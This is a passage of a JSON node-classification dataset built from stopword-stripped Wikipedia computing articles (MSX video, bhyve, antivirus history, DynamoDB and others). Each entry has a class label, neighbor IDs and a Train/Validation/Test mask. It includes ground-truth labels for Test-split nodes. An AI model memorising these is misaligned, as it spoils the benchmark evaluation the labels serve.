      410,
      3610,
      5531,
      798,
      5024,
      420,
      6692,
      10660,
      11175,
      554,
      7983,
      8367,
      690,
      3634,
      5810,
      2361,
      9913,
      1083,
      6271,
      9408,
      7489,
      9665,
      8003,
      2502,
      5063,
      4041,
      2892,
      77,
      5069,
      7887,
      3152,
      5201,
      9292,
      2259,
      9424,
      7893,
      854,
      10956,
      5211,
      10076,
      6367,
      3561,
      107,
      9964,
      3949,
      5998,
      752,
      1136,
      4464,
      4595,
      5875,
      7669,
      4342,
      2679,
      10619,
      5758,
      2431
    ],
    "mask": "Test"
  },
  {
    "node_id": 2209,
    "label": 3,
    "text": "MSX_Video_access_method:msx video access method colecovision sg-1000 creativision first-generation msx computers use tms9918a video display processor vdp 16 kib video memory shared main memory compared unified system video memory used 8-bit computers time apple ii zx spectrum commodore 64 separate memory advantage freeing z80 processor 64 kib address space main ram vdp n't need steal cpu cycles access video memory disadvantage program use cpu dedicated i/o instructions command vdp manipulate contents video ram slows video access also makes porting games unified-memory platforms difficult attempts porting zx spectrum games uk system similar msx often thwarted difference also programmers learn optimally use advanced capabilities vdp tms9918a method accessing video ram slower direct access used unified-memory computers accessing video memory involved first outputting low- hi-byte 14-bit video memory address i/o port 99 one bytes 8-bit data port 98 write memory pointer advances next address consecutive addresses written repeated instructions 98 z80 fast otir/otdr block instructions could used instead ldir/lddr still allowed vram access rate restricted unless vertical blanking however screen layout top-down character 8 lines advancing next character difficult use programmers tried convert existing software originally written system another arrangement screen layout trying use tms9918a high resolution mode video memory conventional way method indirect-access could far slower 8-bit computers unified memory like piece ram consequently machines using vdp could inefficient certain graphical tasks scrolling games entailed moving entire background memory instead able use z80 efficient fast block move instructions write elaborate routines first read bytes video memory system memory back another location video memory one byte time increase speed acceptable level programmers often limited scrolling 8-pixel steps looked primitive comparison 1 2 pixel scrolling steps available zx spectrum commodore 64 machines although commodore 64 also used 8-pixel steps fine-scroll register could compensate msx-1 tms9918a several features make shortfall example programmable character set allowed indirection greatly increase scrolling character table moved instead pixel data 32 hardware sprites sprites however limited example atari-8-bit systems highest resolution 16x16 pixels single-color transparency bigger drawback though reality scan line segments maximum 4 sprites could simultaneously displayed one picture scan line attempting place 5-th sprites scan line segment scan line four others would result flickering missing scan line segments still care multiple multi-color sprites could created way many japanese games prove zx spectrum sprites porting games often much trouble re-write game structure take advantage sprites often simply ignored porting games tricks available circumvent scrolling speed related problems using clever programming techniques video chip capabilities available zx spectrum using undocumented text mode supported multiple colors addition using built re-programmable fonts possible combine high resolution graphics faster scrolling also able use sprites method widely used japanese programmers writing native software rarely british programmers porting spectrum software video problems described especially sprite limits scrolling fixed newer msx-2 video chips however time 16 bit systems like amiga atari st started dominate market",
    "neighbors": [
      1403,
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2210,
    "label": 3,
    "text": "Degree_of_parallelism:degree parallelism degree parallelism dop metric indicates many operations simultaneously executed computer especially useful describing performance parallel programs multi-processor systems program running parallel computer may utilize different numbers processors different times time period number processors used execute program defined degree parallelism plot dop function time given program called parallelism profile",
    "neighbors": [
      785,
      7699,
      7963,
      6815,
      5798,
      9126,
      6184,
      2345,
      4909,
      7218,
      8501,
      5948,
      4286,
      2113,
      8514,
      5956,
      4423,
      1480,
      1866,
      8523,
      4308,
      344,
      2264,
      731,
      2140,
      11487,
      4194,
      5090,
      7142,
      1267,
      7802,
      508,
      3197,
      8447
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2211,
    "label": 2,
    "text": "Mark_Bolzern:mark bolzern mark bolzern one original pioneers internet linux computer operating system bolzern founder early linux-specific community portals linuxnews linuxmall linuxpro linuxguru penguinpower bolzern also creator original plush tux mascot based original drawing larry ewing work linuxmall allowed bolzern directly affect linux community linuxmall support various linux events achievements play significant role story book rebel code author glyn moody bolzern graduated 1976 west anchorage high school among things first worked monroe 1880 programmed via graphite marked cards octal started fascination computers later bolzern attended uaa university alaska anchorage studies late 1970s helped test early statewide multi-campus e-mail system short year cal poly pomona california polytechnic state university transferred uaf university alaska fairbanks studied electrical engineering also played data general nova computer system used development alohanet low level error correcting packet protocols csma/cd pioneered fundamental underlying protocols tcp/ip ethernet wifi internet denied access administrators bolzern cracked university alaska statewide computer network 1978 something n't think possible standard user used central honeywell 66 fairbanks send emails system users inviting use software participate apple ii user group via early shared account created set group communication via mailx mail extended enhanced version standard unix command mail extended features bolzern able use create one first bulletin board systems bbs history apple access terminal emulation etc performed free via software called uacncap written distributed bolzern associate made apple ii original model hayes 300 baud modem remote terminal gcos system later ibm pc version called pc communicator bolzern pc-talk released well gcos early variant unix field linux user full name goes called gcos field bolzern also used software continue accessing system third-floor lathrop hall dorm room via wires one phone entire floor hall also anywhere else happened apple ii hayes modem well communicate family back home via email continued graduation 1981 bachelor science electrical engineering bolzern created uaf soon became used university teachers students years thereafter uaf bolzern worked motorola installer radio technician graduation took job ibm scoring second highest anyone else hired year qualification exams ibm quickly learned repair office equipment ibm time influential recognizing value desktop pc ultimately ibm management support resigned ibm moved sales new machines computerland sold first 50 pcs delivered within state alaska general computer services inc. gcs founded 1981 incorporated september 17 1982 bolzern ’ consulting company anything everything pc-related created commercial job cost estimating software created early isp internet service provider state alaska time founded anchorage pc compatibles user group later became alaska computer society also “ computer talk ” world ’ first far know radio talk show computers moving aurora colorado bolzern worked advised colorado department education built statewide legislation notification system helped get computers public school system uswest unix informix sql database systems accounting information management also travelled speaker many topics related computers early 90 ’ linux born bolzern soon became one outspoken advocates development adoption wgs work group solutions founded aurora colorado june 23 1993 originally subsidiary gcs big/main achievement introducing first commercially-sold software linux flagship clipper compiler unix shortly thereafter linuxpro linuxpro one better known distributions distros early years linux even winning best comdex award 1995 presented noted science fiction writer jerry pournelle wgs shortly thereafter received letter stating company sued using word linux mental patient trademarked linus torvalds said wanted word linux freely available anyone unfortunately could achieved non-profit group administer phil hughes linux journal john maddog hall digital equipment corp bolzern among others assembled group fight lawsuit eventually settled outright giving trademark directly linus torvalds agreement li linux international would manage john maddog hall bolzern made sure trademark put linus name agreement made linux international li perpetual administrator linux international since morphed linux foundation late 1995 bolzern founded colorado linux users enthusiasts clue bringing local high school students aurora co businesses interested linux together others used linux presented many topics activities included linux install fests allowing new users learn linux various distros available along power open source programs specifically linux may june 1998 articles bolzern wrote published regarding linux base system project commenting growth linux community wgs transitioned linuxmall 1996 2000 firm 60 employees based aurora colorado largest online shopping center software products linux computer operating system expected initial public offering stock market downturn led instead reverse acquisition bought 25 million ebiz enterprises already-publicly listed firm change name linuxmall.com transaction april march 2000 several articles published microsoft relation linux several penned bolzern addition penguinpower name many collectables designed bolzern manufactured linuxmall tux pin worn peter h. salus unfortunately growth linuxmall cut short early 2000s bursting tech bubble non-delivery 10 million dollar check vcs said already mail subsequent merger activities bolzern semi-retired travel take care wife virginia stricken cancer february 2012 mark bolzern serves chief technical officer northern utility services llc anchorage alaska originally grew autobiographical page also details regarding mark professional achievements bolzern ’ involvement ultimately became linux foundation significant work includes li bolzern initially structured vendor organization responsible lsb linux standard base lpi linux professional institute professional linux certification linux trademark administration among things born zurich switzerland bolzern family father mother mark arrived spain via ship along vw bus immigrating via ellis island permanently closed bolzern family arrived alaska via florida texas california brother ronald born waiting alaska highway open arrived anchorage 1962 prior famous 1964 earthquake naturalized u.s. citizen along parents june 17 1966 bolzern spent several years limelight traveling caring wife virginia dealing breast cancer death march 8 2007 time involved encouragement ministry called bbtj",
    "neighbors": [
      2785,
      1192,
      4011,
      7983,
      6352,
      11153,
      9459,
      5492,
      5531,
      823,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 2212,
    "label": 2,
    "text": "Bhyve:bhyve bhyve pronounced bee hive formerly written bhyve type-2 hypervisor written freebsd ported number illumos based distributions including smartos omnios bhyve runs freebsd 9+ openbsd netbsd linux illumos windows nt windows vista later windows server 2008 later guests current development efforts aim widening support operating systems x86-64 architecture",
    "neighbors": [
      6150,
      10761,
      2058,
      3082,
      4636,
      1071,
      7733,
      9784,
      5177,
      5697,
      5702,
      8266,
      5710,
      7248,
      7249,
      9306,
      607,
      10851,
      8816,
      9844,
      9343,
      2180,
      4238,
      684,
      3248,
      7349,
      1718,
      5819,
      2236,
      11459,
      9927,
      8395,
      8909,
      6864,
      10455,
      6361,
      8410,
      5356,
      11506,
      8439,
      1273,
      7425,
      5378,
      1801,
      6924,
      8976,
      274,
      8466,
      6438,
      295,
      10535,
      10537,
      4908,
      7983,
      9009,
      9525,
      11573,
      823,
      318,
      8520,
      850,
      1362,
      7507,
      6491,
      2910,
      7521,
      1891,
      7027,
      2421,
      2424,
      1927,
      9625,
      1946,
      11698,
      9655,
      1465,
      5049,
      3006,
      3551,
      998,
      1513,
      4073,
      2545,
      3058,
      9201
    ],
    "mask": "Test"
  },
  {
    "node_id": 2213,
    "label": 4,
    "text": "Antivirus_software:antivirus software antivirus software anti-virus software abbreviated av software also known anti-malware computer program used prevent detect remove malware antivirus software originally developed detect remove computer viruses hence name however proliferation kinds malware antivirus software started provide protection computer threats particular modern antivirus software protect users malicious browser helper objects bhos browser hijackers ransomware keyloggers backdoors rootkits trojan horses worms malicious lsps dialers fraudtools adware spyware products also include protection computer threats infected malicious urls spam scam phishing attacks online identity privacy online banking attacks social engineering techniques advanced persistent threat apt botnet ddos attacks although roots computer virus date back early 1949 hungarian scientist john von neumann published theory self-reproducing automata first known computer virus appeared 1971 dubbed creeper virus computer virus infected digital equipment corporation dec pdp-10 mainframe computers running tenex operating system creeper virus eventually deleted program created ray tomlinson known reaper people consider reaper first antivirus software ever written – may case important note reaper actually virus specifically designed remove creeper virus creeper virus followed several viruses first known appeared wild elk cloner 1981 infected apple ii computers 1983 term computer virus coined fred cohen one first ever published academic papers computer viruses cohen used term computer virus describe program affect computer programs modifying way include possibly evolved copy note recent precise definition computer virus given hungarian security researcher péter szőr code recursively replicates possibly evolved copy first ibm pc compatible wild computer virus one first real widespread infections brain 1986 number viruses grown exponentially computer viruses written early mid-1980s limited self-reproduction specific damage routine built code changed programmers became acquainted computer virus programming created viruses manipulated even destroyed data infected computers internet connectivity widespread computer viruses typically spread infected floppy disks antivirus software came use updated relatively infrequently time virus checkers essentially check executable files boot sectors floppy disks hard disks however internet usage became common viruses began spread online competing claims innovator first antivirus product possibly first publicly documented removal wild computer virus i.e vienna virus performed bernd fix 1987 1987 andreas lüning kai figge founded g data software 1985 released first antivirus product atari st platform 1987 ultimate virus killer uvk also released de facto industry standard virus killer atari st atari falcon last version version 9.0 released april 2004 1987 united states john mcafee founded mcafee company part intel security end year released first version virusscan also 1987 czechoslovakia peter paško rudolf hrubý miroslav trnka created first version nod antivirus 1987 fred cohen wrote algorithm perfectly detect possible computer viruses finally end 1987 first two heuristic antivirus utilities released flushot plus ross greenberg anti4us erwin lanting o'reilly book malicious mobile code virus protection windows roger grimes described flushot plus first holistic program fight malicious mobile code mmc however kind heuristic used early av engines totally different used today first product heuristic engine resembling modern ones f-prot 1991 early heuristic engines based dividing binary different sections data section code section legitimate binary usually starts always location indeed initial viruses re-organized layout sections overrode initial portion section order jump end file malicious code located—only going back resume execution original code specific pattern used time legitimate software represented elegant heuristic catch suspicious code kinds advanced heuristics later added suspicious section names incorrect header size regular expressions partial pattern in-memory matching 1988 growth antivirus companies continued germany tjark auerbach founded avira h+bedv time released first version antivir named luke filewalker time bulgaria vesselin bontchev released first freeware antivirus program later joined frisk software also frans veldman released first version thunderbyte antivirus also known tbav sold company norman safeground 1998 czechoslovakia pavel baudiš eduard kučera started avast time alwil software released first version avast antivirus june 1988 south korea ahn cheol-soo released first antivirus software called v1 founded ahnlab later 1995 finally autumn 1988 united kingdom alan solomon founded international created dr. solomon anti-virus toolkit although launched commercially 1991 – 1998 solomon ’ company acquired mcafee november 1988 professor panamerican university mexico city named alejandro e. carriles copyrighted first antivirus software mexico name byte matabichos byte bugkiller help solve rampant virus infestation among students also 1988 mailing list named virus-l started bitnet/earn network new viruses possibilities detecting eliminating viruses discussed members mailing list alan solomon eugene kaspersky kaspersky lab friðrik skúlason frisk software john mcafee mcafee luis corrons panda security mikko hyppönen f-secure péter szőr tjark auerbach avira vesselin bontchev frisk software 1989 iceland friðrik skúlason created first version f-prot anti-virus back 1989 founded frisk software 1993 meanwhile united states symantec founded gary hendrix 1982 launched first symantec antivirus macintosh sam sam 2.0 released march 1990 incorporated technology allowing users easily update sam intercept eliminate new viruses including many n't exist time program release end 1980s united kingdom jan hruska peter lammer founded security firm sophos began producing first antivirus encryption products period hungary also virusbuster founded recently incorporated sophos 1990 spain mikel urizarbarrena founded panda security panda software time hungary security researcher péter szőr released first version pasteur antivirus italy gianfranco tonello created first version virit explorer antivirus founded tg soft one year later 1990 computer antivirus research organization caro founded 1991 caro released virus naming scheme originally written friðrik skúlason vesselin bontchev although naming scheme outdated remains existing standard computer security companies researchers ever attempted adopt caro members includes alan solomon costin raiu dmitry gryaznov eugene kaspersky friðrik skúlason igor muttik mikko hyppönen morton swimmer nick fitzgerald padgett peterson peter ferrie righard zwienenberg vesselin bontchev 1991 united states symantec released first version norton antivirus year czech republic jan gritzbach tomáš hofer founded avg technologies grisoft time although released first version anti-virus guard avg 1992 hand finland f-secure founded 1988 petri allas risto siilasmaa – name data fellows released first version antivirus product f-secure claims first antivirus firm establish presence world wide web 1991 european institute computer antivirus research eicar founded antivirus research improve development antivirus software 1992 russia igor danilov released first version spiderweb later became dr web 1994 av-test reported 28,613 unique malware samples based md5 database time companies founded 1996 romania bitdefender founded released first version anti-virus expert avx 1997 russia eugene kaspersky natalya kaspersky co-founded security firm kaspersky lab 1996 also first wild linux virus known staog 1999 av-test reported 98,428 unique malware samples based md5 database 2000 rainer link howard fuhs started first open source antivirus engine called openantivirus project 2001 tomasz kojm released first version clamav first ever open source antivirus engine commercialised 2007 clamav bought sourcefire turn acquired cisco systems 2013 2002 united kingdom morten lund theis søndergaard co-founded antivirus firm bullguard 2005 av-test reported 333,425 unique malware samples based md5 database 2007 av-test reported number 5,490,960 new unique malware samples based md5 year 2012 2013 antivirus firms reported new malware samples range 300,000 500,000 per day years become necessary antivirus software use several different strategies e.g specific email network protection low level modules detection algorithms well check increasing variety files rather executables several reasons 2005 f-secure first security firm developed anti-rootkit technology called blacklight users usually connected internet continual basis jon oberheide first proposed cloud-based antivirus design 2008 february 2008 mcafee labs added industry-first cloud-based anti-malware functionality virusscan artemis name tested av-comparatives february 2008 officially unveiled august 2008 mcafee virusscan cloud av created problems comparative testing security software – part av definitions testers control constantly updated av company servers thus making results non-repeatable result anti-malware testing standards organisation amtso started working method testing cloud products adopted may 7 2009 2011 avg introduced similar cloud service called protective cloud technology following 2013 release apt 1 report mandiant industry seen shift towards signature-less approaches problem capable detecting mitigating zero-day attacks numerous approaches address new forms threats appeared including behavioral detection artificial intelligence machine learning cloud-based file detonation according gartner expected rise new entrants carbon black cylance crowdstrike force epp incumbents new phase innovation acquisition one method bromium involves micro-virtualization protect desktops malicious code execution initiated end user another approach sentinelone carbon black focuses behavioral detection building full context around every process execution path real time cylance leverages artificial intelligence model based machine learning increasingly signature-less approaches defined media analyst firms next-generation antivirus seeing rapid market adoption certified antivirus replacement technologies firms coalfire directdefense response traditional antivirus vendors trend micro symantec sophos responded incorporating next-gen offerings portfolios analyst firms forrester gartner called traditional signature-based antivirus ineffective outdated one solid theoretical results study computer viruses frederick b. cohen 1987 demonstration algorithm perfectly detect possible viruses however using different layers defense good detection rate may achieved several methods antivirus engine use identify malware traditional antivirus software relies heavily upon signatures identify malware substantially malware arrives hands antivirus firm analysed malware researchers dynamic analysis systems determined malware proper signature file extracted added signatures database antivirus software although signature-based approach effectively contain malware outbreaks malware authors tried stay step ahead software writing oligomorphic polymorphic recently metamorphic viruses encrypt parts otherwise modify method disguise match virus signatures dictionary many viruses start single infection either mutation refinements attackers grow dozens slightly different strains called variants generic detection refers detection removal multiple threats using single virus definition example vundo trojan several family members depending antivirus vendor classification symantec classifies members vundo family two distinct categories trojan.vundo trojan.vundo.b may advantageous identify specific virus quicker detect virus family generic signature inexact match existing signature virus researchers find common areas viruses family share uniquely thus create single generic signature signatures often contain non-contiguous code using wildcard characters differences lie wildcards allow scanner detect viruses even padded extra meaningless code detection uses method said heuristic detection anti-virus software attempt scan rootkits rootkit type malware designed gain administrative-level control computer system without detected rootkits change operating system functions cases tamper anti-virus program render ineffective rootkits also difficult remove cases requiring complete re-installation operating system real-time protection on-access scanning background guard resident shield autoprotect synonyms refer automatic protection provided antivirus anti-spyware anti-malware programs monitors computer systems suspicious activity computer viruses spyware adware malicious objects 'real-time words data loaded computer active memory inserting cd opening email browsing web file already computer opened executed commercial antivirus software end-user license agreements include clause subscription automatically renewed purchaser credit card automatically billed renewal time without explicit approval example mcafee requires users unsubscribe least 60 days expiration present subscription bitdefender sends notifications unsubscribe 30 days renewal norton antivirus also renews subscriptions automatically default apparent antivirus programs actually malware masquerading legitimate software winfixer ms antivirus mac defender false positive false alarm antivirus software identifies non-malicious file malware happens cause serious problems example antivirus program configured immediately delete quarantine infected files common microsoft windows antivirus applications false positive essential file render windows operating system applications unusable recovering damage critical software infrastructure incurs technical support costs businesses forced close whilst remedial action undertaken examples serious false-positives running real-time protection multiple antivirus programs concurrently degrade performance create conflicts however using concept called multiscanning several companies including g data software microsoft created applications run multiple engines concurrently sometimes necessary temporarily disable virus protection installing major updates windows service packs updating graphics card drivers active antivirus protection may partially completely prevent installation major update anti-virus software cause problems installation operating system upgrade e.g upgrading newer version windows place — without erasing previous version windows microsoft recommends anti-virus software disabled avoid conflicts upgrade installation process active anti-virus software also interfere firmware update process functionality computer programs hampered active anti-virus software example truecrypt disk encryption program states troubleshooting page anti-virus programs conflict truecrypt cause malfunction operate slowly anti-virus software impair performance stability games running steam platform support issues also exist around antivirus application interoperability common solutions like ssl vpn remote access network access control products technology solutions often policy assessment applications require up-to-date antivirus installed running antivirus application recognized policy assessment whether antivirus application updated part policy assessment library user unable connect studies december 2007 showed effectiveness antivirus software decreased previous year particularly unknown zero day attacks computer magazine c't found detection rates threats dropped 40–50 2006 20–30 2007 time exception nod32 antivirus managed detection rate 68 according zeus tracker website average detection rate variants well-known zeus trojan low 40 problem magnified changing intent virus authors years ago obvious virus infection present viruses day written amateurs exhibited destructive behavior pop-ups modern viruses often written professionals financed criminal organizations 2008 eva chen ceo trend micro stated anti-virus industry over-hyped effective products — misleading customers — years independent testing major virus scanners consistently shows none provide 100 virus detection best ones provided high 99.9 detection simulated real-world situations lowest provided 91.1 tests conducted august 2013 many virus scanners produce false positive results well identifying benign files malware although methods may differ notable independent quality testing agencies include av-comparatives icsa labs west coast labs virus bulletin av-test members anti-malware testing standards organization anti-virus programs always effective new viruses even use non-signature-based methods detect new viruses reason virus designers test new viruses major anti-virus applications make sure detected releasing wild new viruses particularly ransomware use polymorphic code avoid detection virus scanners jerome segura security analyst paretologic explained proof concept virus used graphics processing unit gpu avoid detection anti-virus software potential success involves bypassing cpu order make much harder security researchers analyse inner workings malware detecting rootkits major challenge anti-virus programs rootkits full administrative access computer invisible users hidden list running processes task manager rootkits modify inner workings operating system tamper antivirus programs file infected computer virus anti-virus software attempt remove virus code file disinfection always able restore file undamaged state circumstances damaged files restored existing backups shadow copies also true ransomware installed software damaged requires re-installation however see system file checker writeable firmware computer infected malicious code major concern infected bios could require actual bios chip replaced ensure malicious code completely removed anti-virus software effective protecting firmware motherboard bios infection 2014 security researchers discovered usb devices contain writeable firmware modified malicious code dubbed badusb anti-virus software detect prevent malicious code run undetected computer could even infect operating system prior booting antivirus software drawbacks first impact computer performance furthermore inexperienced users lulled false sense security using computer considering invulnerable may problems understanding prompts decisions antivirus software presents incorrect decision may lead security breach antivirus software employs heuristic detection must fine-tuned minimize misidentifying harmless software malicious false positive antivirus software usually runs highly trusted kernel level operating system allow access potential malicious process files creating potential avenue attack us national security agency nsa uk government communications headquarters gchq intelligence agencies respectively exploiting anti-virus software spy users anti-virus software highly privileged trusted access underlying operating system makes much appealing target remote attacks additionally anti-virus software years behind security-conscious client-side applications like browsers document readers means acrobat reader microsoft word google chrome harder exploit 90 percent anti-virus products according joxean koret researcher coseinc singapore-based information security consultancy antivirus software running individual computers common method employed guarding malware solution solutions also employed users including unified threat management utm hardware network firewalls cloud-based antivirus online scanners network firewalls prevent unknown programs processes accessing system however antivirus systems make attempt identify remove anything may protect infection outside protected computer network limit activity malicious software present blocking incoming outgoing requests certain tcp/ip ports firewall designed deal broader system threats come network connections system alternative virus protection system cloud antivirus technology uses lightweight agent software protected computer offloading majority data analysis provider infrastructure one approach implementing cloud antivirus involves scanning suspicious files using multiple antivirus engines approach proposed early implementation cloud antivirus concept called cloudav cloudav designed send programs documents network cloud multiple antivirus behavioral detection programs used simultaneously order improve detection rates parallel scanning files using potentially incompatible antivirus scanners achieved spawning virtual machine per detection engine therefore eliminating possible issues cloudav also perform retrospective detection whereby cloud detection engine rescans files file access history new threat identified thus improving new threat detection speed finally cloudav solution effective virus scanning devices lack computing power perform scans examples cloud anti-virus products panda cloud antivirus crowdstrike cb defense immunet comodo group also produced cloud-based anti-virus antivirus vendors maintain websites free online scanning capability entire computer critical areas local disks folders files periodic online scanning good idea run antivirus applications computers applications frequently slow catch threats one first things malicious software attack disable existing antivirus software sometimes way know attack turning online resource installed infected computer virus removal tools available help remove stubborn infections certain types infection examples include avast free anti- malware avg free malware removal tools avira antivir removal tool also worth noting sometimes antivirus software produce false positive result indicating infection none rescue disk bootable cd usb storage device used run antivirus software outside installed operating system order remove infections dormant bootable antivirus disk useful example installed operating system longer bootable malware resisting attempts removed installed antivirus software examples bootable disks include bitdefender rescue cd kaspersky rescue disk 2018 windows defender offline integrated windows 10 since anniversary update rescue cd software also installed onto usb storage device bootable newer computers according fbi survey major businesses lose 12 million annually dealing virus incidents survey symantec 2009 found third small medium-sized business use antivirus protection time whereas 80 home users kind antivirus installed according sociological survey conducted g data software 2010 49 women use antivirus program",
    "neighbors": [
      3072,
      2049,
      4100,
      5636,
      10245,
      10756,
      9227,
      9233,
      9746,
      8724,
      9242,
      6683,
      1052,
      9246,
      9761,
      3106,
      11299,
      2084,
      550,
      9256,
      2601,
      10388,
      43,
      6699,
      3629,
      9771,
      9775,
      8753,
      2611,
      8243,
      8247,
      10297,
      3643,
      7739,
      9791,
      1088,
      10816,
      10308,
      4165,
      10903,
      4173,
      7251,
      11415,
      91,
      2654,
      4194,
      612,
      11364,
      107,
      10872,
      5245,
      5246,
      1151,
      127,
      3201,
      5757,
      131,
      5761,
      5764,
      2182,
      6786,
      7809,
      11400,
      9356,
      6797,
      10898,
      4755,
      3732,
      4245,
      9364,
      4247,
      8343,
      665,
      1690,
      3739,
      156,
      7834,
      9885,
      6303,
      10392,
      161,
      2721,
      5281,
      10915,
      5799,
      6823,
      3243,
      7851,
      10924,
      7855,
      176,
      6834,
      10420,
      9910,
      4793,
      5305,
      2749,
      3262,
      704,
      7362,
      8387,
      7368,
      10952,
      202,
      2251,
      2252,
      3789,
      5325,
      719,
      5327,
      1745,
      7887,
      7891,
      8398,
      10957,
      2262,
      6358,
      6360,
      1242,
      4314,
      1245,
      2783,
      9442,
      6373,
      4843,
      10987,
      6382,
      1776,
      9970,
      3320,
      4344,
      2811,
      3323,
      5373,
      10492,
      1279,
      4863,
      9983,
      5891,
      6917,
      11019,
      7948,
      11021,
      3342,
      5902,
      9488,
      7441,
      8978,
      4883,
      11022,
      278,
      4374,
      8474,
      3867,
      4892,
      5404,
      6430,
      6431,
      10531,
      5924,
      1318,
      8998,
      297,
      2859,
      300,
      7979,
      8493,
      3887,
      5935,
      7473,
      7983,
      4403,
      9523,
      823,
      5433,
      9537,
      8514,
      3395,
      4421,
      11081,
      1355,
      5454,
      10574,
      4435,
      5971,
      10070,
      855,
      8024,
      858,
      2907,
      4956,
      7515,
      1886,
      3935,
      6496,
      8032,
      9055,
      9569,
      3941,
      11621,
      5479,
      3944,
      11622,
      4972,
      877,
      4462,
      10092,
      2416,
      4464,
      5490,
      3955,
      6516,
      11470,
      9591,
      4475,
      10110,
      1408,
      2945,
      4994,
      899,
      7044,
      8580,
      9607,
      1417,
      5002,
      3981,
      9102,
      10637,
      3473,
      9341,
      6550,
      3996,
      10141,
      11166,
      2975,
      2976,
      5025,
      5536,
      10657,
      8614,
      8615,
      939,
      1451,
      9646,
      1970,
      10166,
      4023,
      9145,
      7098,
      6588,
      11198,
      7103,
      5057,
      7106,
      8131,
      3525,
      4552,
      9160,
      1994,
      10696,
      2508,
      5069,
      6606,
      5586,
      8148,
      2005,
      10708,
      3032,
      9688,
      11225,
      11390,
      988,
      8668,
      1504,
      2528,
      3555,
      9187,
      1515,
      11244,
      7151,
      6129,
      9713,
      4595,
      6643,
      10740,
      10232,
      2041,
      507,
      2558,
      8703
    ],
    "mask": "None"
  },
  {
    "node_id": 2214,
    "label": 4,
    "text": "Common_Computing_Security_Standards_Forum:common computing security standards forum common computing security standards forum ccss forum voluntary organization vendors providers security software operating systems internet browsers ccss forum formed following goals 2009 melih abdulhayoğlu organized common computing security standards forum initially purpose maintaining list legitimate antivirus engines response scareware products present antivirus software either adware malware according fbi aware estimated loss victims rogue antivirus software much 150 million ccss maintains so-called whitelist legitimate organizations provide antivirus systems trusted vendors list viewed organization web site http //www.ccssforum.org",
    "neighbors": [
      517,
      8615
    ],
    "mask": "Test"
  },
  {
    "node_id": 2215,
    "label": 9,
    "text": "Security_and_Trust_Services_API_for_J2ME:security trust services api j2me security trust services api j2me satsa collection java me-based apis provides compliant devices additional cryptographic security features permits communication java application smartcard apdu java card rmi protocols satsa developed java community process jsr 177 covers following features natively supported original java platform satsa api considered optional feature sun microsystems mandated java phones however device manufacturers may include required several device manufacturers already chosen include satsa products among several mobile phone manufacturers",
    "neighbors": [
      4960,
      9665,
      3561,
      3626,
      9745,
      9011
    ],
    "mask": "None"
  },
  {
    "node_id": 2216,
    "label": 9,
    "text": "FL_(programming_language):fl programming language fl short function level functional programming language created ibm almaden research center john backus john williams edward wimmers 1980s documented report 1989 fl designed successor backus earlier fp language providing specific support backus termed function-level programming fl dynamically typed strict functional programming language throw catch exception semantics much like ml function implicit history argument used things like strictly functional input/output i/o also used linking c code optimization exists type-system extension hindley–milner type inference many language ’ innovative ideas since implemented kenneth e. iverson ’ j language plasm geometry-oriented extension subset fl language first described 1992",
    "neighbors": [
      9345,
      1826,
      8262,
      10668,
      2670,
      7055,
      5168,
      1976,
      5081,
      7386,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2217,
    "label": 1,
    "text": "Amazon_DynamoDB:amazon dynamodb amazon dynamodb fully managed proprietary nosql database service supports key-value document data structures offered amazon.com part amazon web services portfolio dynamodb exposes similar data model derives name dynamo different underlying implementation dynamo multi-master design requiring client resolve version conflicts dynamodb uses synchronous replication across multiple datacenters high durability availability dynamodb announced amazon cto werner vogels january 18 2012 presented evolution amazon simpledb solution vogels motivates project 2012 announcement amazon began decentralized network services originally services direct access ’ databases became bottleneck engineering operations services moved away direct access pattern favor public-facing apis still third-party relational database management systems struggled handle amazon ’ client base culminated 2004 holiday season several technologies failed high scale traffic engineers normalizing relational systems reduce data redundancy design optimizes storage sacrifice stored given “ item ” data e.g information pertaining product product database several relations takes time assemble disjoint parts query many amazon ’ services demanded mostly primary-key reads data speed top priority putting pieces together taxing systems content compromising storage efficiency amazon ’ response dynamo highly available key-value store built internal use dynamo seemed everything engineers needed adoption lagged amazon developers opted “ works ” design patterns s3 simpledb systems noticeable design flaws demand overhead provisioning hardware scaling re-partitioning data amazon next iteration nosql technology dynamodb automated database management operations reduce headache developers dynamodb differs amazon services allowing developers purchase service based throughput rather storage auto scaling enabled database scale automatically additionally administrators request throughput changes dynamodb spread data traffic number servers using solid-state drives allowing predictable performance offers integration hadoop via elastic mapreduce september 2013 amazon made available local development version dynamodb developers test dynamodb-backed applications locally dynamodb table features items attributes form primary key whereas relational systems item features table attribute juggles “ null ” “ unknown ” values absence dynamodb items schema-less exception creating table developer specifies primary key table requires key item therein primary keys must scalar strings numbers binary take one two forms single-attribute primary key known table ’ “ partition key. ” partition key determines partition item hashes to––more partitioning below––so ideal partition key uniform distribution range primary key also feature second attribute dynamodb calls table ’ “ sort key. ” case partition keys unique paired sort keys make unique identifier item partition key still used determine partition item stored within partition items sorted sort key relational model indices typically serve “ helper ” data structures supplement table allow dbms optimize queries hood improve query functionality dynamodb query optimizer index simply another table different key two sits beside original developer creates index creates new copy data fields specifies get copied minimum fields indexes original table ’ primary key dynamodb users issue queries directly indices two types indices available global secondary index features partition key optional sort key ’ different original table ’ partition key local secondary index features partition key original table different sort key indices introduce entirely new query functionality dynamodb database allowing queries new keys indexing system data redundancy pure simple relational philosophy permit indices prime example dynamodb prioritizes speed space efficiency like relational systems dynamodb updates indices automatically addition/update/deletion must judicious creating risk slowing write-heavy database slew index updates dynamodb uses json syntax ubiquity development community create table action demands three arguments tablename keyschema––a list containing partition key optional sort key––and attributedefinitions––a list attributes defined must least contain definitions attributes used partition sort keys whereas relational databases offer robust query languages dynamodb offers put get update delete operations put requests contain tablename attribute item attribute consists attributes values item update request follows syntax similarly get delete item simply specify tablename key dynamodb uses hashing b trees manage data upon entry data first distributed different partitions hashing partition key partition store 10gb data handle default 1000 write capacity units wcu 3000 read capacity units rcu one rcu represents one strongly consistent read per second two eventually consistent reads per second items 4kb size one wcu represents one write per second item 1kb size prevent data loss dynamodb features two-tier backup system replication long-term storage partition features three nodes contains copy partition ’ data node also contains two data structures b tree used locate items replication log notes changes made node dynamodb periodically takes snapshots two data structures stores month s3 engineers perform point-in-time restores databases within partition one three nodes designated “ leader node. ” write operations travel first leader node propagating makes writes consistent dynamodb maintain status leader sends “ heartbeat ” node every 1.5 seconds another node stop receiving heartbeats initiate new leader election dynamodb uses paxos algorithm elect 